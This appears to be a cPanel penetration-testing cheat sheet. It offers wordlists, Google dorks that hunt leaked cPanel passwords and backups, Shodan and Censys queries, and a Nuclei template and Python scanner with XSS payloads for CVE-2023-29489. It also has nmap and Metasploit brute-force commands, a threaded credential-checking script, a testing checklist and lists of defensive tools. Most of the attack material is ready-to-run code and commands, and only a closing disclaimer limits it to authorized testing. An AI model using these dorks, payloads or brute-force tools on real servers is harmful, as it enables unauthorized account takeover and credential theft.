/horde/
/roundcube/
/squirrelmail/
/autodiscover/
/autoconfig/
/cgi-sys/defaultwebpage.cgi
/cgi-sys/suspendedpage.cgi
/cgi-sys/bxd.cgi
/usr/local/cpanel/
/scripts/
/backup/
/tmp/
/var/cpanel/
cPanel Subdomain Wordlist
cpanel
whm
webmail
mail
webdisk
autodiscover
autoconfig
cpcalendars
cpcontacts
ftp
smtp
pop
imap
pop3
ns1
ns2
dns1
dns2
server
host
hosting
panel
admin
control
manage
cPanel File Extensions
.cgi
.pl
.pm
.php
.conf
.config
.log
.bak
.backup
.old
.txt
.sql
.gz
.tar
.zip
Common cPanel Usernames
root
admin
cpanel
whm
webmaster
administrator
hostmaster
postmaster
support
Google Dorks for cPanel
Finding cPanel Installations
inurl:"/cpanel"
inurl:":2082"
inurl:":2083"
inurl:"/whm"
inurl:":2086"
inurl:":2087"
intitle:"cPanel"
intitle:"Web Host Manager"
inurl:"/cgi-sys/defaultwebpage.cgi"
Finding Exposed Credentials
"cpanel username" "cpanel password" ext:txt
"cpanel login" filetype:txt
"ftp username" "ftp password" "cpanel" ext:txt
site:pastebin.com "cpanel" "password"
site:github.com "cpanel" "password"
Finding Configuration Files
inurl:"/cpanel.config"
filetype:conf "cpanel"
filetype:log "cpanel"
inurl:"/var/cpanel/"
Finding Backup Files
inurl:"/backup/" "cpanel"
filetype:sql "cpanel"
filetype:gz "backup" "cpanel"
intitle:"Index of" "/backup"
Shodan Queries
Finding cPanel Servers
"Server: cpsrvd"
port:2082
port:2083
port:2086
port:2087
http.title:"cPanel"
http.title:"Web Host Manager"
ssl.cert.subject.CN:"cpanel"
Finding Vulnerable Versions
"cPanel" "11.102"
"cPanel" "11.106"
"cPanel" "11.108"
http.html:"cPanel, Inc."
Censys Queries
services.http.response.headers.server:"cpsrvd"
services.port:2082
services.port:2083
services.http.response.html_title:"cPanel"
Nuclei Templates
CVE-2023-29489 XSS
id: cpanel-xss-cve-2023-29489

info:
  name: cPanel XSS - CVE-2023-29489
  author: security-team
  severity: high
  description: Reflected XSS in cPanel cpanelwebcall endpoint
  reference:
    - https://www.assetnote.io/resources/research/finding-xss-in-a-million-websites-cpanel-cve-2023-29489
  tags: cpanel,xss,cve2023

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cpanelwebcall/<script>alert(1)</script>"
      - "{{BaseURL}}:2082/cpanelwebcall/<script>alert(1)</script>"
      - "{{BaseURL}}:2083/cpanelwebcall/<script>alert(1)</script>"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(1)</script>"
        part: body
      - type: status
        status:
          - 200
cPanel Version Detection
id: cpanel-version-detect

info:
  name: cPanel Version Detection
  author: security-team
  severity: info
  tags: cpanel,detect

requests:
  - method: GET
    path:
      - "{{BaseURL}}:2082"
      - "{{BaseURL}}:2083"
      - "{{BaseURL}}/cpanel"
    matchers:
      - type: regex
        regex:
          - 'cPanel.*Version ([0-9.]+)'
        part: body
Nmap Scripts
cPanel Detection
nmap -p 2082,2083,2086,2087 --script=http-title target.com
cPanel Brute Force
nmap -p 2082,2083 --script=http-brute --script-args userdb=users.txt,passdb=passwords.txt target.com
SSL Certificate Analysis
nmap -p 2083,2087 --script=ssl-cert target.com
Metasploit Modules
cPanel Login Scanner
use auxiliary/scanner/http/cpanel_login
set RHOSTS target.com
set RPORT 2083
set SSL true
set USER_FILE users.txt
set PASS_FILE passwords.txt
set THREADS 10
run
cPanel Version Scanner
use auxiliary/scanner/http/cpanel_version
set RHOSTS target.com
run
Burp Suite Extensions
cPanel Scanner
- Extension: Custom scanner for cPanel vulnerabilities
- Features:
- Automatic endpoint discovery
- Version detection
- Vulnerability scanning
- Session management testing
Custom Scripts
cPanel Port Scanner (Python)
#!/usr/bin/env python3
import socket
import sys


def scan_cpanel_ports(target):
    ports = [2082, 2083, 2086, 2087, 2095, 2096]
    print(f"[*] Scanning {target} for cPanel ports...")
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)
        result = sock.connect_ex((target, port))
        if result == 0:
            print(f"[+] Port {port} is open")
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    scan_cpanel_ports(sys.argv[1])
cPanel XSS Scanner (Python)
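#!/usr/bin/env python3
import sys
from urllib.parse import urlsplit

import requests


def test_cpanel_xss(target):
    payloads = [
        "<script>alert(1)</script>",
        "<img src=x onerror=alert(1)>",
        "<svg/onload=alert(1)>",
    ]
    # Accept either a bare host name or a full URL.
    parts = urlsplit(target if "://" in target else f"https://{target}")
    # The site as given, plus the cPanel HTTP (2082) and HTTPS (2083) ports.
    # urljoin() cannot be used here: it treats ":2082/..." as a relative path.
    bases = [
        f"{parts.scheme}://{parts.netloc}",
        f"http://{parts.hostname}:2082",
        f"https://{parts.hostname}:2083",
    ]
    print(f"[*] Testing {target} for CVE-2023-29489...")
    for base in bases:
        for payload in payloads:
            url = f"{base}/cpanelwebcall/{payload}"
            try:
                # verify=False: certificate validation is disabled for this request
                response = requests.get(url, verify=False, timeout=5)
            except requests.RequestException:
                continue  # port closed or connection failed; try the next one
            if payload in response.text:
                print(f"[!] VULNERABLE: {url}")
                return True
    print("[*] Not vulnerable")
    return False


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target>")
        sys.exit(1)
    test_cpanel_xss(sys.argv[1])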
cPanel Credential Checker (Python)
#!/usr/bin/env python3
import requests
import sys
from concurrent.futures import ThreadPoolExecutor


def check_credentials(target, username, password):
    url = f"https://{target}:2083/login/"
    data = {
        'user': username,
        'pass': password
    }
    try:
        response = requests.post(url, data=data, verify=False, timeout=10)
        if "incorrect" not in response.text.lower():
            print(f"[+] Valid credentials: {username}:{password}")
            return True
    except:
        pass
    return False


def main(target, credentials_file):
    print(f"[*] Testing credentials against {target}...")
    with open(credentials_file, 'r') as f:
        credentials = [line.strip().split(':') for line in f]
    with ThreadPoolExecutor(max_workers=10) as executor:
        for username, password in credentials:
            executor.submit(check_credentials, target, username, password)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target> <credentials_file>")
        sys.exit(1)
    main(sys.argv[1], sys.argv[2])
Security Testing Checklist
Information Gathering
- [ ] Identify cPanel version
- [ ] Enumerate open ports (2082, 2083, 2086, 2087, etc.)
- [ ] Check SSL certificate details
- [ ] Identify installed services (Apache, Exim, Dovecot, etc.)
- [ ] Enumerate subdomains
- [ ] Check for exposed backup files
- [ ] Review DNS records
Authentication Testing
- [ ] Test for default credentials
- [ ] Attempt username enumeration
- [ ] Test password reset functionality
- [ ] Check for brute force protection
- [ ] Test two-factor authentication bypass
- [ ] Verify session management
- [ ] Test for session fixation
Authorization Testing
- [ ] Test privilege escalation
- [ ] Check for insecure direct object references
- [ ] Test API authorization
- [ ] Verify file permissions
Input Validation
- [ ] Test for XSS (CVE-2023-29489)
- [ ] Test for SQL injection
- [ ] Test for command injection
- [ ] Test for path traversal
- [ ] Test for file upload vulnerabilities
- [ ] Test for CSRF
Configuration Testing
- [ ] Review security settings
- [ ] Check for insecure SSL/TLS configuration
- [ ] Verify firewall rules
- [ ] Check for unnecessary services
- [ ] Review file permissions
- [ ] Check for exposed configuration files
Error Handling
- [ ] Test error messages for information disclosure
- [ ] Check for stack traces
- [ ] Verify custom error pages
Logging and Monitoring
- [ ] Verify logging is enabled
- [ ] Check log file permissions
- [ ] Test for log injection
Recommended Security Tools
Web Application Firewalls
- ModSecurity - Open source WAF
- Imunify360 - Commercial security solution for cPanel
- CloudFlare - CDN with WAF capabilities
Intrusion Detection Systems
- AIDE - Advanced Intrusion Detection Environment
- OSSEC - Host-based IDS
- Snort - Network IDS
Malware Scanners
- ClamAV - Open source antivirus
- Maldet - Linux Malware Detect
- Imunify360 - Commercial malware scanner
Firewall Solutions
- CSF (ConfigServer Firewall) - Note: EOL, use alternatives
- fail2ban - Intrusion prevention
- iptables - Linux firewall
Backup Solutions
- JetBackup - Commercial backup solution
- cPanel Backup - Built-in backup system
- Acronis - Enterprise backup solution
Monitoring Tools
- Nagios - Infrastructure monitoring
- Zabbix - Enterprise monitoring
- Prometheus - Metrics collection
Additional Resources
Books
- "cPanel User Guide and Tutorial"
- "Linux Server Security"
- "Web Application Security"
Online Courses
- cPanel Certification Training
- Linux Security Fundamentals
- Web Application Penetration Testing
Communities
- cPanel Forums: https://forums.cpanel.net/
- Reddit r/webhosting
- Stack Overflow cPanel tag
Blogs
- cPanel Blog: https://www.cpanel.net/blog/
- Imunify360 Blog: https://blog.imunify360.com/
- Security Research Blogs
Vulnerability Databases
- NVD: https://nvd.nist.gov/
- CVE: https://cve.mitre.org/
- Exploit-DB: https://www.exploit-db.com/
GitHub Repositories
- cPanel Official: https://github.com/CPANELINC
- Security Tools: https://github.com/topics/cpanel
- Exploit Collections: https://github.com/search?q=cpanel+exploit
Legal Disclaimer
IMPORTANT: All tools, techniques, and information provided in this document are for educational and authorized security testing purposes only.
- Only test systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- Always follow responsible disclosure practices
- Comply with all applicable laws and regulations
- Use this information ethically and responsibly
Misuse of this information may result in criminal prosecution. The authors and contributors are not responsible for any misuse or damage caused by the information provided.